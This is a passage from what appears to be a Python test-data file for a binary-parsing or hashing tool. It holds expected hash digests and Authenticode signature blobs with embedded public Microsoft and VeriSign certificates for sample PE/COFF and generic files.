PCA0\x1e\x17\r081022203922Z\x17\r100122204922Z0\x7f1\x0b0\t\x06\x03U\x04\x06\x13\x02US1\x130\x11\x06\x03U\x04\x08\x13\nWashington1\x100\x0e\x06\x03U\x04\x07\x13\x07Redmond1\x1e0\x1c\x06\x03U\x04\n\x13\x15Microsoft Corporation1\r0\x0b\x06\x03U\x04\x0b\x13\x04MOPR1\x1a0\x18\x06\x03U\x04\x03\x13\x11Microsoft Windows0\x82\x01"0\r\x06\t*\x86H\x86\xf7\r\x01\x01\x01\x05\x00\x03\x82\x01\x0f\x000\x82\x01\n\x02\x82\x01\x01\x00\xdc:\xd3D\xf4n \x9f\xdd\xa4\x0e\x82N\xc7\x86^c\xcc\xca\xe5BSK\x85\xfa]ql\xcfv\x0c\x18\x8b\xa6\r\xf5J\xf7\xfe\x17\xf2\x90\xccb\xc7$\xad\x9b\x9a\xe1E;a\xd8\r\x05i\xc7\xcd\x88*\xb8\xb9\x18\x1e`\x10_\x88\xc6\xd2\x82NmI\xc5\xbe\\\x12\x86H\x85\x89\x91\x81\xcd\x1b\xad\x1f\xb7-gy\xf1{\x9f%\x87\x14v_\xe3\x0ed\xa1ra%\xe5ui\xc5\x14\xf1_\x07V\xa4\rp\x06#\xa7l\xdd\x82\xae\xd9\x9bG\xa4\xa5l\x08\xb0X\xf1SjO\xda\x85a\xcb\x02{I\xaf\x1f\xbb\xe0\xd7\xb9^\xdbs\x89v\xc1:\xbb\r\xf5\x97\xf0\x88]iw\x80\xcf\xf1~\x03\x9fsm\xde\x05\xb8/w\xb5TUE\xd0\xd28\xbd\x96\xe3\xf7\xea@\xe5\xac\x19\xfcq\xcb(\'\xaaq\xa1r\xb5\x12\'\xc1Q\xf66\xc5\xc0\xc7{::\x937\x04\xcc\xee\x0bixduA\xb6x"\x0fw\x84\xf7K\x8dFe\x92[MVku\x04F?\x0b\x1b\xb4\x19\xbf\x02\x03\x01\x00\x01\xa3\x82\x02\x0f0\x82\x02\x0b0\x1f\x06\x03U\x1d%\x04\x180\x16\x06\x08+\x06\x01\x05\x05\x07\x03\x03\x06\n+\x06\x01\x04\x01\x827\n\x03\x060\x1d\x06\x03U\x1d\x0e\x04\x16\x04\x14\xa1\xe6\xc3e\xd0\xe6\xe8(b\xc2\xf3\xc2#\xa6\x1cI\x82\x0b\xd5S0\x0e\x06\x03U\x1d\x0f\x01\x01\xff\x04\x04\x03\x02\x07\x800\x1f\x06\x03U\x1d#\x04\x180\x16\x80\x14\x90\x8b\x11\xa5p\xed\xe0\xf9\xa9\xc0\xac\x08\xc7\xb5\xf4\x82\xb1<\xc5J0{\x06\x03U\x1d\x1f\x04t0r0p\xa0n\xa0l\x864http://crl.microsoft.com/pki/crl/products/WinPCA.crl\x864http://www.microsoft.com/pki/crl/products/WinPCA.crl0R\x06\x08+\x06\x01\x05\x05\x07\x01\x01\x04F0D0B\x06\x08+\x06\x01\x05\x05\x070\x02\x866http://www.microsoft.com/pki/certs/MicrosoftWinPCA.crt0\x81\xc6\x06\x03U\x1d \x04\x81\xbe0\x81\xbb0\x81\xb8\x06\t+\x06\x01\x04\x01\x827\x15/0\x81\xaa0@\x06\x08+\x06\x01\x05\x05\x07\x02\x01\x164https://www.microsoft.com/pki/ssl/cps/WindowsPCA.htm0f\x06\x08+\x06\x01\x05\x05\x07\x02\x020Z\x1eX\x00C\x00o\x00p\x00y\x00r\x00i\x00g\x00h\x00t\x00 \x00\xa9\x00 \x001\x009\x009\x009\x00-\x002\x000\x000\x005\x00 \x00M\x00i\x00c\x00r\x00o\x00s\x00o\x00f\x00t\x00 \x00C\x00o\x00r\x00p\x00o\x00r\x00a\x00t\x00i\x00o\x00n\x00.0\r\x06\t*\x86H\x86\xf7\r\x01\x01\x05\x05\x00\x03\x82\x01\x01\x00s_\xca\x80\x1c`Fo\xb94\x9d\x88\xe3\xbe"\x8c\xfa\xe6X\x9a\xab{\x1a\x97\xfd\xed.9\xccY[\x1dz\x06\x8a\xbbC\x93{\x1e\xa1\x88S\xdfD\xf8S\xa9\xea\xf6g\x1b:x\x84\x11jo)G\x90\n\x0c{"wNo\xb8d)\xdf\x06\xc7\xc8s\x84\xd6f\xa0\xca\xd9Z&\x82W\xf9\xe3O9\xaf.\x8e\xb1\x06[r\xf272\xaeN\xce<}\xb0\x12+\x9e\xa5u\xe3C\xa6\x12\x8b\x06\x14\x98w\xe3X2%`\x07\x8cYq\xa7qA\xb3\x06\x8d\\\xef\x9c\x7fZ"m\xb7\xd3\xd9\xf5\xa6\x1bR\xde\xf5~v|\xfe\xf4\xc8#\x1aK%\xeb\xe4\xee\xaf\x10\x0bU\xc3\xd8\xc1\x17\x85ao\xd3?\xb6\xe9\xec\x84\xa5\xeem\xb2\xff\xe8l\x95\xab+^\xc8\x85\xc3\x11`\xac\xfa\x02\x05\xf1{\xda\xc3iI\x96\xa5p\xf9efF\x10\x8d4\xe9!\x94<\x0fqJ\x1c\xea\x1f\xf7#\xa6\x87`4\xe9\x14\xe1\xde\x03Y\xb4\x02\x1d:\xaf\xe3U\x05\xf5\xed\xc1\xf4\xe4]\x0e\xd3\x970\x82\x06\x070\x82\x03\xef\xa0\x03\x02\x01\x02\x02\na\x16h4\x00\x00\x00\x00\x00\x1c0\r\x06\t*\x86H\x86\xf7\r\x01\x01\x05\x05\x000_1\x130\x11\x06\n\t\x92&\x89\x93\xf2,d\x01\x19\x16\x03com1\x190\x17\x06\n\t\x92&\x89\x93\xf2,d\x01\x19\x16\tmicrosoft1-0+\x06\x03U\x04\x03\x13$Microsoft Root Certificate Authority0\x1e\x17\r070403125309Z\x17\r210403130309Z0w1\x0b0\t\x06\x03U\x04\x06\x13\x02US1\x130\x11\x06\x03U\x04\x08\x13\nWashington1\x100\x0e\x06\x03U\x04\x07\x13\x07Redmond1\x1e0\x1c\x06\x03U\x04\n\x13\x15Microsoft Corporation1!0\x1f\x06\x03U\x04\x03\x13\x18Microsoft Time-Stamp PCA0\x82\x01"0\r\x06\t*\x86H\x86\xf7\r\x01\x01\x01\x05\x00\x03\x82\x01\x0f\x000\x82\x01\n\x02\x82\x01\x01\x00\x9f\xa1l\xb1\xdf\xdbH\x92*|k.\x19\xe1\xbd\xe2\xe3\xc5\x99Q#P\xad\xce\xdd\x18N$\x0f\xee\xd1\xa7\xd1L\xadt0 \x11\xeb\x07\xd5T\x95\x15I\x94\x1bB\x92\xae\x98\\0&\xda\x00k\xe8{\xbd\xec\x89\x07\x0f\xf7\x0e\x04\x98\xf0\x89\xcc\x1f\xcb3$\x87\x9d\xf2\xf4g\x1c,\xfc{\xe7\x88\x1d\xea\xe7N\xa3\xa1\xc1#S\xca\x8d\xfaE\xcf\t\xd0^\xaf\xd0\xb0B\x04\xa2\xf9\xa6l\x93g\xd7(\xdcFS\xb0\x86\xd0\xe5(F.\'\xac\x86OUR\x0c\xe4\x03,\xfbj\x90\x900n\x87\xf3Y0\x9d\xfa~\xd6\x97\xb3\xe8!\x97~\xf8\xd2\x13\xf3\x08\xb7SmR\xb4E\x90\x9fH\x00JGf\x11\')f\xa8\x97\xe4\xd3\x06\x81J\xa2\xf9\x84\xa7\x11G\x14\t\x82\x9f\x84\xedUx\xfe\x01\x9a\x1dP\x08\x85\x00\x100F\xed\xb7\xde#F\xbb\xc4-T\x9f\xaf\x1exA1w\xcc\x9b\xdf;\x83\x93\xa1a\x02\xb5\x1d\r\xb1\xfc\xf7\x9b\xb2\x01\xce"KT\xff\xf9\x05\xc3\xc2 \x0b\x02\x03\x01\x00\x01\xa3\x82\x01\xab0\x82\x01\xa70\x0f\x06\x03U\x1d\x13\x01\x01\xff\x04\x050\x03\x01\x01\xff0\x1d\x06\x03U\x1d\x0e\x04\x16\x04\x14#4\xf8\xd9RFp\n\xed@\xfbv\xfb\xb3+\xb0\xc35\xb3\x0f0\x0b\x06\x03U\x1d\x0f\x04\x04\x03\x02\x01\x860\x10\x06\t+\x06\x01\x04\x01\x827\x15\x01\x04\x03\x02\x01\x000\x81\x98\x06\x03U\x1d#\x04\x81\x900\x81\x8d\x80\x14\x0e\xac\x82`@V\'\x97\xe5%\x13\xfc*\xe1\nS\x95Y\xe4\xa4\xa1c\xa4a0_1\x130\x11\x06\n\t\x92&\x89\x93\xf2,d\x01\x19\x16\x03com1\x190\x17\x06\n\t\x92&\x89\x93\xf2,d\x01\x19\x16\tmicrosoft1-0+\x06\x03U\x04\x03\x13$Microsoft Root Certificate Authority\x82\x10y\xad\x16\xa1J\xa0\xa5\xadLsX\xf4\x07\x13.e0P\x06\x03U\x1d\x1f\x04I0G0E\xa0C\xa0A\x86?http://crl.microsoft.com/pki/crl/products/microsoftrootcert.crl0T\x06\x08+\x06\x01\x05\x05\x07\x01\x01\x04H0F0D\x06\x08+\x06\x01\x05\x05\x070\x02\x868http://www.microsoft.com/pki/certs/MicrosoftRootCert.crt0\x13\x06\x03U\x1d%\x04\x0c0\n\x06\x08+\x06\x01\x05\x05\x07\x03\x080\r\x06\t*\x86H\x86\xf7\r\x01\x01\x05\x05\x00\x03\x82\x02\x01\x00\x10\x97\x8a\xc3\\\x03D6\xdd\xe9\xb4\xadw\xdb\xceyQM\x01\xb1.tq[m\x0c\x13\xab\xce\xbe{\x8f\xb8.\xd4\x12\xa2\x8cmb\xb8W\x02\xcbN \x13P\x99\xddz@\xe2W\xbb\xafX\x9a\x1c\xe1\x1d\x01\x86\xac\xbbx\xf2\x8b\xd0\xec;\x01\xee\xe2\xbe\x8f\n\x05\xc8\x8dH\xe2\xf0S\x15\xddO\xab\x92\xe4\xe7\x8dj\xd5\x80\xc1\xe6\x94\xf2\x06/\x85\x03\xe9\x91*$"p\xfb\xf6\xfc\xe4x\x99.\r\xf7\x07\xe2p\xbc\x18N\x9d\x8ek\nr\x95\xb8\xa19\x9cg-\xc5Q\x0e\xeab\\?\x16\x98\x8b ?\xe2\x07\x1a2\xf9\xcc1Jv1=+r\x0b\xc8\xeap=\xff\x85\n\x13\xdf\xc2\na\x8e\xf0\xd7\xb8\x17\xebN\x8b\x7f\xc55+^\xa3\xbf\xeb\xbc}\x0bB{\xd4Sr!\xee0\xca\xbbxe\\[\x01\x17\n\x14\x0e\xd2\xda\x14\x98\xf5<\xb9fX\xb3-/\xe7\xf9\x85\x86\xccQV\xe8\x9dp\x94l\xac9L\xd4\xf6y\xbf\xaa\x18zb)\xef\xa2\x9b)4\x06w\x1ab\xc9=\x1em\x1f\x82\xf0\x0b\xc7,\xbb\xcfC\xb3\xe5\xf9\xec}\xb5\xe3\xa4\xa8t5\xb8N\xc5q#\x12&v\x0b<R\x8cqZFC\x14\xbc\xb3\xb3\xb0Mg\xc8\x9fB\xff\x80y!\x80\x9e\x150f\xe8B\x12^\x1a\xc8\x9e"!\xd0C\xe9+\xe9\xbb\xf4H\xcc,\xd4\xd82\x80L&*H$_Z\xeaV\xef\xa6\xde\x99\x9d\xca:o\xbd\x81\'t\x06\x11\xeev!\xbf\x9b\x82\xc1\'T\xb6\xb1j=\x89\xa1va\xb4n\xa1\x13\xa6\xbf\xaaG\xf0\x12o\xfd\x8a2l\xb2\xfe\xdfQ\xc8\x8c#\xc9f\xbd\x9d\x1d\x87\x12d\x02=-\xafY\x8f\xb8\xe4!\xe5\xb5\xb0\xcac\xb4xT\x05\xd4A.P\xac\x94\xb0\xa5x\xab\xb3\xa0\x96u\x1a\xd9\x92\x87\x13u"/2\xa8\x08n\xa0[\x8c%\xbf\xa0\xef\x84\xca!\xd6\xeb\x1eO\xc9\x9a\xeeI\xe0\xf7\x01eo\x89\x0b}\xc8i\xc8\xe6n\xea\xa7\x97\xce1)\xff\x0e\xc5[\\\xd8M\x1b\xa1\xd8\xfa/\x9e?.U\x16k\xc9\x13\xa3\xfd0\x82\x06\xa10\x82\x04\x89\xa0\x03\x02\x01\x02\x02\na\x07\x02\xdc\x00\x00\x00\x00\x00\x0b0\r\x06\t*\x86H\x86\xf7\r\x01\x01\x05\x05\x000_1\x130\x11\x06\n\t\x92&\x89\x93\xf2,d\x01\x19\x16\x03com1\x190\x17\x06\n\t\x92&\x89\x93\xf2,d\x01\x19\x16\tmicrosoft1-0+\x06\x03U\x04\x03\x13$Microsoft Root Certificate Authority0\x1e\x17\r050915215541Z\x17\r160315220541Z0\x81\x811\x0b0\t\x06\x03U\x04\x06\x13\x02US1\x130\x11\x06\x03U\x04\x08\x13\nWashington1\x100\x0e\x06\x03U\x04\x07\x13\x07Redmond1\x1e0\x1c\x06\x03U\x04\n\x13\x15Microsoft Corporation1+0)\x06\x03U\x04\x03\x13"Microsoft Windows Verification PCA0\x82\x01"0\r\x06\t*\x86H\x86\xf7\r\x01\x01\x01\x05\x00\x03\x82\x01\x0f\x000\x82\x01\n\x02\x82\x01\x01\x00\xc5\xac\x93N\xe6J\x11\x9e7\xd05\xd2\xb0\x06\\\x83\x14\xa5a\x92\xfc\xfe\xb3\x89\xc1\xe6\xcd\xc8\x1f1\x84\t\x914F\x92,\xb8\xee,\xc5 s\xc4\xe8\x1a\xd8\x8d\xcezh\xb5fx\x8b\xe5`\x15\xa2\xf6)Z\x1d^]\xfcb\xd3\xc1\\)\x89\xfb3\xf8\x16\x956\xdd\xb1FtirS\xd5\xaa\xe8\x8a\x99\x1a\xd8\xf7g\t\xd9\t "8z\xd6\x03#\xd7\x89\x9f\x1c\x01\xb7Q\xdf\x98f*\x02\x8b\x06\xec\xe4)\xef[B\x17\x15\x97Q\x8d}%\n\xaf%\xe8\xde\xdc\x9bg\x16\nVs\x9d\xb3\x1d\x85\x83\x0b~3+b3\xce\x1c \x81K^\xd3\xc6I\xb8\xf6.\xd3N\xb0qDFd>\xdeCf\x04\xb9\xcc\x83H:\xc56z\x04H\x0b\x89\x02=c\xa2\x01v)\x97u\xe9\x01\xe6\x00\x97\t\x92\xf8\xe2\'\xf0)gCw\xc3P\x96S1\xe1\xb6q\x8b\xecw\xc7|1H\xd5\xb8%"\x8c\x00\xf7(8z\xbd|\xc7?\xcd@&w\xdd\x00\x00\x11\x9a\x95\xbe\x1f\xdb\x02\x03\x01\x00\x01\xa3\x82\x02:0\x82\x0260\x10\x06\t+\x06\x01\x04\x01\x827\x15\x01\x04\x03\x02\x01\x000\x1d\x06\x03U\x1d\x0e\x04\x16\x04\x14\x90\x8b\x11\xa5p\xed\xe0\xf9\xa9\xc0\xac\x08\xc7\xb5\xf4\x82\xb1<\xc5J0\x0b\x06\x03U\x1d\x0f\x04\x04\x03\x02\x01\xc60\x0f\x06\x03U\x1d\x13\x01\x01\xff\x04\x050\x03\x01\x01\xff0\x81\x98\x06\x03U\x1d#\x04\x81\x900\x81\x8d\x80\x14\x0e\xac\x82`@V\'\x97\xe5%\x13\xfc*\xe1\nS\x95Y\xe4\xa4\xa1c\xa4a0_1\x130\x11\x06\n\t\x92&\x89\x93\xf2,d\x01\x19\x16\x03com1\x190\x17\x06\n\t\x92&\x89\x93\xf2,d\x01\x19\x16\tmicrosoft1-0+\x06\x03U\x04\x03\x13$Microsoft Root Certificate Authority\x82\x10y\xad\x16\xa1J\xa0\xa5\xadLsX\xf4\x07\x13.e0P\x06\x03U\x1d\x1f\x04I0G0E\xa0C\xa0A\x86?http://crl.microsoft.com/pki/crl/products/microsoftrootcert.crl0T\x06\x08+\x06\x01\x05\x05\x07\x01\x01\x04H0F0D\x06\x08+\x06\x01\x05\x05\x070\x02\x868http://www.microsoft.com/pki/certs/MicrosoftRootCert.crt0\x81\x80\x06\x03U\x1d \x04y0w0u\x06\t+\x06\x01\x04\x01\x827\x15/0h0f\x06\x08+\x06\x01\x05\x05\x07\x02\x020Z\x1eX\x00C\x00o\x00p\x00y\x00r\x00i\x00g\x00h\x00t\x00 \x00\xa9\x00 \x001\x009\x009\x009\x00-\x002\x000\x000\x005\x00 \x00M\x00i\x00c\x00r\x00o\x00s\x00o\x00f\x00t\x00 \x00C\x00o\x00r\x00p\x00o\x00r\x00a\x00t\x00i\x00o\x00n\x00.0\x1f\x06\x03U\x1d%\x04\x180\x16\x06\x08+\x06\x01\x05\x05\x07\x03\x03\x06\n+\x06\x01\x04\x01\x827\n\x03\x060\r\x06\t*\x86H\x86\xf7\r\x01\x01\x05\x05\x00\x03\x82\x02\x01\x00%1\xa1X\xeaR\xe5\xe1\x17\x0c\xe6\xf1?x\xa3?r\xaf\xa7W\x10S\x89\x10^2\x9c\xb6p\xc3\x15+M\x1504\xe8\xc0j\xe4\x1c\xd3. eH\xd7\x1b\x98b!\xbaE\x9fJ\xec\xdb/\t\x19Q\xe5\xed2\x19Q/\xe1\xdd\xfb\xc6R\xfd\xeb\xc6\x82%B\x03\t\xa68\xb66\x1f\xcc\xc9\x80\xbbZi\x181\xc3\xb3\xa0\xb3gG\xbe\x9d\xc7\xe2?\x96\xb3\x88\xf8\x19\xbe9\xb9\xe9\x95\xce\xfc|\xaf\xa8\xcd\xd0A\x90\xe0\xd5\xb3\x1c/h\xbb\xdb\x0flj\xdd\xf2\xaf\xde\xf2\xb5\xde\r\xb6\xa6Z\xf0\x86\n\xb9m\x99K?{-\x01\x84l\x8f\x87\xdc\x7f\x8f\xab\x14\x88\xd0\x06\x914\xbe\x1b\x82"\xa4\xbcU\x8a\xad\x9b\xfcs\x14\x10\xc4\xc9\x19\x1e\x07}\x9b\x0e\xc0\x95&]\xc6\x1f\xac\xb4\xf2~\xba%pJ{\xd7\x8e\xd1\x9d\xa0\x13Iz\xb0\x02RR$\xf4\xaf\xdd@-\xe5>2X\xb3Jj\xdd\x11Y\xaa-\xbc\xa4\xa0s8\xf9@wk4\x19W\xcd8h\'\x82\xf8\xd1o\xeb#\xc0?R\xf3N\xd5\x02>j\x9a+\xc1\xf51q\xdbAM;\xde\xef\xad\xaf\x1f\x88eC\x1bQ\xb7\x9au\xca\x8eiI\x10\x8fx\x8atE\xb9\t\x8esw\x072JK\xd7h+\x98\xc5\xbaT\xea?\xcb\xa2\x00\x8c\xbb\xd8\x10X\xf2\xdb\xdc\x9b\xcd\xd8\xeaHC\xe2J~e\xb2\xdc\xf5-N%g\xa8\xe0\xb5\xba\xa7\xdd~^\xc1L\x02t\xc9\xb3n\xe3\xf8\xf0\x0b\xed\xfc\xb9)\xc5[\xc96Q\x90\xdbx}\xb92\x0f^v\xd2\x15\\;7!\xc6\xdb\xc9\x19n\xedt*\\,\x0bQIES\xb0\xb2\xb3#\xd4\xa1\xb0_\r\x19\xcd\x14\xa7\xe3<\x9b\x97r\x94\x14\xdf\xff\xc1\x90\x1b\xa5\xdf\xf5\xa9\xf3\x1b\x17\xda\xb5\xfcD\xe0\xe8\xe2<\xa2z\xbb\xbbe\xe6M\xb1\xb5\x15\xa1\xd9g;\xb0\x0c};\xe9\xeeQ*G\xf5\x15\x0f\x8c\xad].5\xdf\xf4\xa4.\xf6\x137Z+\xe8U\x9aI,\x97\xce\x9d\x01\x9e\x97F\\\xd9-\xbc$Z\x95YoM\xca\x9d\xd6W&1\x82\x04\x960\x82\x04\x92\x02\x01\x010\x81\x900\x81\x811\x0b0\t\x06\x03U\x04\x06\x13\x02US1\x130\x11\x06\x03U\x04\x08\x13\nWashington1\x100\x0e\x06\x03U\x04\x07\x13\x07Redmond1\x1e0\x1c\x06\x03U\x04\n\x13\x15Microsoft Corporation1+0)\x06\x03U\x04\x03\x13"Microsoft Windows Verification PCA\x02\na\x01\xc6\xc1\x00\x00\x00\x00\x00\x070\t\x06\x05+\x0e\x03\x02\x1a\x05\x00\xa0\x81\xba0\x19\x06\t*\x86H\x86\xf7\r\x01\t\x031\x0c\x06\n+\x06\x01\x04\x01\x827\x02\x01\x040\x1c\x06\n+\x06\x01\x04\x01\x827\x02\x01\x0b1\x0e0\x0c\x06\n+\x06\x01\x04\x01\x827\x02\x01\x150#\x06\t*\x86H\x86\xf7\r\x01\t\x041\x16\x04\x14\xcd?\xf6\x88\xbe1\x7f\xaduK\n\xf5B\x99\xc6\xab\x81\xc92\x190Z\x06\n+\x06\x01\x04\x01\x827\x02\x01\x0c1L0J\xa0$\x80"\x00M\x00i\x00c\x00r\x00o\x00s\x00o\x00f\x00t\x00 \x00W\x00i\x00n\x00d\x00o\x00w\x00s\xa1"\x80 http://www.microsoft.com/windows0\r\x06\t*\x86H\x86\xf7\r\x01\x01\x01\x05\x00\x04\x82\x01\x00\x9d\xe7\x0f`\xe4\xc2\t\xb35?\x93O\x08\xf6A\x9f\x0eiu\x89\xa17\xf3\x80\xa6\x9c\x90w3q9#\xa6>)\x8e\xbf\x98\xf8=\xee\x8ae\x83\x1b|\x0b{\xd7\th\x12}\x03~\r\x1b/K\xec=Y-\xfc\xc2\x8b8\x90v}\xdek1\xb57\x88\x90\x96\x83\xb51!\xa9\xd7\x15\x87\xfa\x12\xc1\x84\xf0\x91\x80\x0e#rH\x8a\x04\x97R\xba\xfe\xc3\xeb\xa1\xdb`\x08<1\n>*|\xae\xeex\xf4\xcd\x02b7\x00\xcf3/\x13>R{\xdf\xa0\xcb\x84\xa6cRg\xc8b\r\xb0|=:\xdf5M&\x0c*N\x83\xe9-\xa0 \xee)ZJ\xadD\xb95\t\xa4\x0f\xa2(c\xe9\xdb\xd0;\xcb0\xdd!{}\xec\x8a/\xe3\xfa\xdf9\x1aa\xf8EF\x9eC\xd4H\xbaT>4\x9f\x88si]\x85\xae\xdev\xf4{\x968\x0b\r\x11\xa4^/qN\xf1\xd9n~\x00\xa4J\xc0\x88\xe4\xf0\x02\xae\\\x94\xd6\r\xbf\'\xdfSQ\x08\xd2$\x18\xd0\xba"\x91\xe7\xc4\x0b\xa1\x82\x02\x1d0\x82\x02\x19\x06\t*\x86H\x86\xf7\r\x01\t\x061\x82\x02\n0\x82\x02\x06\x02\x01\x010\x81\x850w1\x0b0\t\x06\x03U\x04\x06\x13\x02US1\x130\x11\x06\x03U\x04\x08\x13\nWashington1\x100\x0e\x06\x03U\x04\x07\x13\x07Redmond1\x1e0\x1c\x06\x03U\x04\n\x13\x15Microsoft Corporation1!0\x1f\x06\x03U\x04\x03\x13\x18Microsoft Time-Stamp PCA\x02\na\x04\xcai\x00\x00\x00\x00\x00\x080\x07\x06\x05+\x0e\x03\x02\x1a\xa0]0\x18\x06\t*\x86H\x86\xf7\r\x01\t\x031\x0b\x06\t*\x86H\x86\xf7\r\x01\x07\x010\x1c\x06\t*\x86H\x86\xf7\r\x01\t\x051\x0f\x17\r090714014555Z0#\x06\t*\x86H\x86\xf7\r\x01\t\x041\x16\x04\x14\x80\xd1\xdb\xd8\r\x9b\x91a\xc3\x9c$\xb5m\xcd\x85"b\xf5u\x1f0\r\x06\t*\x86H\x86\xf7\r\x01\x01\x05\x05\x00\x04\x82\x01\x00\x86\xec4$\xf6\x9d\xc4\xe93\xc6e\xa3\x02\x1b4+\x8f1G\xda\xf8\xb1\xd9\xcd[\x0b\xb2T\xef\x1c\x93\xb8g\xb1\x0e?@\xfam@\xa5\xbf\xbf\r"%\xfd\x9a\xa7S\x04\xfbk\x9b\xd3?K\x00\x91\xe2a\x024\xd3\x9b\xa9\x85\x16BE\xfc\x8b~Z\xc1u\xe8L\xb4\x0f\xbe\xe6M\x94\xdc\xaf\xe2\xa9\xe8\x18\x8aF|\xcf\xeaa\xaaU\xc1\xdd\xb4\x8fj\xa6i\xa4\xd13n%(\xbe\x96\xf5\xfds\x88\xe1H%\xc3|.1\xe6\xf7G\x85C\xc8\xa7;E\x0e\xe7\\[\xef=\x0b\x7f\x91\x96\xca\xba\xf2\\&\xa8\xb7\xa9&\xc79\xf7x\xff\xdd\x9d\xf0\xf2C\xec\xe2\xffq_\xe9\xcd\xb3\x85\xb4\x14\xf4\x99\x81\xdf w\x1c\xabM\x02~\xeb\x95\x94,\xe4\xfd!\xc9\xff\xc7\xea\xae\x9f"W\xc5\xbdd\x04\xd0\xe1\xe1\x1f\x8f\x8a\x9e\xbd\x04\xa3\x07o\xcb\xb1\xd6\x97\xd8-L\xf05u\xbc\xe7\xb2\x88\xcb\xa2n\xd0\x11m\xde\x9e+\xf4\xa7\xd3y\xb0\xb6\x8cX\xa6\xa4K\x14j`0\xff\xa0\xff',
)],
'sha1': b'\x9b\xd4D\xd5\x8bY\xcc\xa82\xbb_\xc9\x11\xf8\x1flf\xb4\x0f\xcc',
'name': 'pecoff',
'md5': b'q\x03\x14]B\xe8\x19h\xd1\xa77\x136\x05[-'
}]
SAMPLE_DATA_2 = [{
'sha256':
b"\xa1]\x00\x99\\\xfc\x00'\x0e6\xc4i\x11\x93\xda\x84\xaa\x10\xf8\xcb\xc3\x1b\x9eI\xf3\xe63\x8c\xd2\x7f\x862",
'sha512':
b'^\\\x8d\x97\xb3o=0\xf2\xfe\xc5\x1c\xc8\xf5g|\xb1U#\x9d\x9d%\x82>}A\xe2\x0f\x81\x14\xb48\x15\x88o\x11|SO\xf8)3\x87\xee8\x88\xb6X\xc4\xfa\xb2&q\n\xe0x\xbcW:!A\x11\x05\x05',
'name':
'generic',
'md5':
b'&\x087]\x0b\x15\xf6a\xfbo\xbd\x7fe\xb6\xae)',
'sha1':
b'\xfcY\x7f~\x84\xd2=\x1db\xd5@\xa5\xfd\xac\xc4p\xd8%\xfat'
}]
SAMPLE_DATA_3 = [{
'sha256':
b'\x05\x0b\xbe\xb6\xb9\xaa@Ba\xb2\t\x892\\hC7\x086z\xaa\xedN\x1d\xff=$\xae)\xa5-*',
'sha512':
b"\xf8\xc0`\xcc<.D\xdbL\x04\x0e|\x9c\xfb\x05B\x8a\x17\x92\n'\xc4N%\x8f\xe7]\x11\xe3l\xe6V\xa7\xd0\x18\x86\xe6F\xfe\x8e\x1a\xa7\xb4\x9a\x16Yw\x0c!*\xb4\x91IB5e\x06\x16\r\x1f\xack\x16r",
'name':
'generic',
'md5':
b'{CV{L2\xadz\xde\xd57\xcd;\x13B\xb9',
'sha1':
b'\x83"\xf1\xc2\xc3U\xd8\x842\xf1\xf0:\x1f#\x1fc\x91!\x86\xbd'
}, {
'SignedData': [(
512, 2,
b'0\x82\x153\x06\t*\x86H\x86\xf7\r\x01\x07\x02\xa0\x82\x15$0\x82\x15 \x02\x01\x011\x0e0\x0c\x06\x08*\x86H\x86\xf7\r\x02\x05\x05\x000g\x06\n+\x06\x01\x04\x01\x827\x02\x01\x04\xa0Y0W03\x06\n+\x06\x01\x04\x01\x827\x02\x01\x0f0%\x03\x01\x00\xa0 \xa2\x1e\x80\x1c\x00<\x00<\x00<\x00O\x00b\x00s\x00o\x00l\x00e\x00t\x00e\x00>\x00>\x00>0 0\x0c\x06\x08*\x86H\x86\xf7\r\x02\x05\x05\x00\x04\x10\xe0(n\x9az\x8d\xf0\xd5\xd9\xea\x88m\xea\x8e\xe6\x00\xa0\x82\x10\xea0\x82\x03z0\x82\x02b\xa0\x03\x02\x01\x02\x02\x108%\xd7\xfa\xf8a\xaf\x9e\xf4\x90\xe7&\xb5\xd6Z\xd50\r\x06\t*\x86H\x86\xf7\r\x01\x01\x05\x05\x000S1\x0b0\t\x06\x03U\x04\x06\x13\x02US1\x170\x15\x06\x03U\x04\n\x13\x0eVeriSign, Inc.1+0)\x06\x03U\x04\x03\x13"VeriSign Time Stamping Services CA0\x1e\x17\r070615000000Z\x17\r120614235959Z0\\1\x0b0\t\x06\x03U\x04\x06\x13\x02US1\x170\x15\x06\x03U\x04\n\x13\x0eVeriSign, Inc.1402\x06\x03U\x04\x03\x13+VeriSign Time Stamping Services Signer - G20\x81\x9f0\r\x06\t*\x86H\x86\xf7\r\x01\x01\x01\x05\x00\x03\x81\x8d\x000\x81\x89\x02\x81\x81\x00\xc4\xb5\xf2R\x15\xbc\x88\x86`)\x16J[/K\x91k\x87\x91\xf35TX5\xea\xd16^bMRQ4q\xc2{f\x1d\x89\xc8\xdd*\xc4j\n\xf67\xd9\x98t\x91\xf6\x92\xae\xb0\xb5v\x96\xf1\xa9JcEG.k\x0b\x92NK+\x8c\xeeXJ\x8b\xd4\x07\xe4\x1a,\xf8\x82\xaaX\xd9\xcdB\xf3-\xc0u\xde\x8d\xab\xc7\x8e\x1d\x9alL\x08\x95\x1e\xde\xdb\xefg\xe1r\xc2I\xc2\x9e`<\xe1\xe2\xbe\x16\xa3cxi\x14{\xad-\x02\x03\x01\x00\x01\xa3\x81\xc40\x81\xc104\x06\x08+\x06\x01\x05\x05\x07\x01\x01\x04(0&0$\x06\x08+\x06\x01\x05\x05\x070\x01\x86\x18http://ocsp.verisign.com0\x0c\x06\x03U\x1d\x13\x01\x01\xff\x04\x020\x0003\x06\x03U\x1d\x1f\x04,0*0(\xa0&\xa0$\x86"http://crl.verisign.com/tss-ca.crl0\x16\x06\x03U\x1d%\x01\x01\xff\x04\x0c0\n\x06\x08+\x06\x01\x05\x05\x07\x03\x080\x0e\x06\x03U\x1d\x0f\x01\x01\xff\x04\x04\x03\x02\x06\xc00\x1e\x06\x03U\x1d\x11\x04\x170\x15\xa4\x130\x111\x0f0\r\x06\x03U\x04\x03\x13\x06TSA1-20\r\x06\t*\x86H\x86\xf7\r\x01\x01\x05\x05\x00\x03\x82\x01\x01\x00P\xc5K\xc8$\x80\xdf\xe4\r$\xc2\xde\x1a\xb1\xa1\x02\xa1\xa6\x82-\x0c\x83\x15\x817\n\x82\x0e,\xb0Z\x17a\xb5\xd8\x05\xfe\x88\xdb\xf1\x91\x91\xb3V\x1a@\xa6\xeb\x92\xbe89\xb0u6t:\x98O\xe47\xba\x99\x89\xca\x95B\x1d\xb0\xb9\xc7\xa0\x8dW\xe0\xfa\xd5d\x04B5N\x01\xd13\xa2\x17\xc8M\xaa\'\xc7\xf2\xe1\x86L\x028M\x83x\xc6\xfcS\xe0\xeb\xe0\x06\x87\xdd\xa4\x96\x9e^\x0c\x98\xe2\xa5\xbe\xbf\x82\x85\xc3`\xe1\xdf\xad(\xd8\xc7\xa5